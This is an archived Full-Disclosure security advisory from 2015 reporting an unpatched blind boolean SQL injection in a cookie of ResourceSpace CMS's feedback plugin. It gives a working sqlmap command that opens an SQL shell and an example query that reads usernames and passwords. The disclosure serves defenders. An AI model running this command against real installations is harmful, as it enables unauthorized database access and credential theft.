lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAB3n5ndfBfOvzyx4oh=EAz9mwh2xwRkd8KG2d_CXjiK5X9GsBQ@mail.gmail.com>
Date: Sat, 22 Aug 2015 11:53:56 -0700
From: William Reyor <opticfiber@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Blind boolean SQL injection vulnerability in ResourceSpace CMS

Title: Blind boolean sql injection vulnerability in ResourceSpace CMS

Author: William F. Reyor III

Contact: opticfiber@...il.com

Published: August 22 2015

Vendor: Montala Limited

Vendor url: www.resourcespace.org

Software: ResourceSpace Digital Asset Management Software

Versions: 7.3.7009  and prior

Status: Unpatched

Vulnerable scripts:

/plugins/feedback/pages/feedback.php


Description:

There is blind boolean SQL injection vulnerability in the user cookie on
the /plugins/feedback/pages/feedback.php application.


This can be validated with sqlmap with the following flags, giving a full
sql shell:

./sqlmap.py -u "http://<hostname>/plugins/feedback/pages/feedback.php"
--cookie="user=test" --level=2 --technique=B --sql-shell

        This also allows an attacker to execute arbitrary queries such as
'select username, password, usergroup from user



-- 
William Reyor

*"L'essentiel est invisible pour les yeux"*

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ